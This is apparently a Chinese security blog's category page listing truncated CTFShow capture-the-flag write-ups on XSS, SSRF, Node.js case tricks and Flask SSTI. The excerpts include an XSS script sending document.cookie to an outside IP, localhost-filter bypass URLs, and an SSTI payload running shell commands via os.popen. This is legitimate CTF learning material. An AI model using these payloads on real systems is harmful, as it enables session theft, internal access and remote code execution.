Category: 安全

CTFShow-XSS

2月 17, 2021

CTF, 安全

web316 反弹cookie到vps123<script>var img = document.createElement("img");img.src = "http://91.67.253.121:1234/?cookie="+document.cookie;a ......

XSS

ctfshow-web入门-Node-WP

2月 15, 2021

CTF, 安全, CTFSHOW

web334 little trick考察js特性: 参考 https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html 1234567toUpperCase():ı ==>Iſ ==>StoLowerCase():İ ==> ......

ctfshow nodejs

ctfshow web入门 SSRF WP

1月 15, 2021

CTF, 安全, CTFSHOW

web351直接访问flag.php POST传参 352 353限制了HTTP协议,ban掉了localhost和127.0.0.1 payload: 1234567url=http://127.1/flag.phpurl=http://0/flag.phpurl=http://0.0.0.0/flag.php ......

SSRF

ctfshow web入门 SSTI WP

1月 7, 2021

CTF, 安全, CTFSHOW

361 3621{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }} 363过滤引号 1{{config.__class ......

python flask SSTI

模板注入

12月 30, 2020

CTF, 安全

前言有关SSTI的一些知识 https://www.cnblogs.com/bmjoker/p/13508538.html SSTI (Server-Side Template Injection)，即服务端模板注入攻击，通过与服务端模板的输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者ge ......

python flask SSTI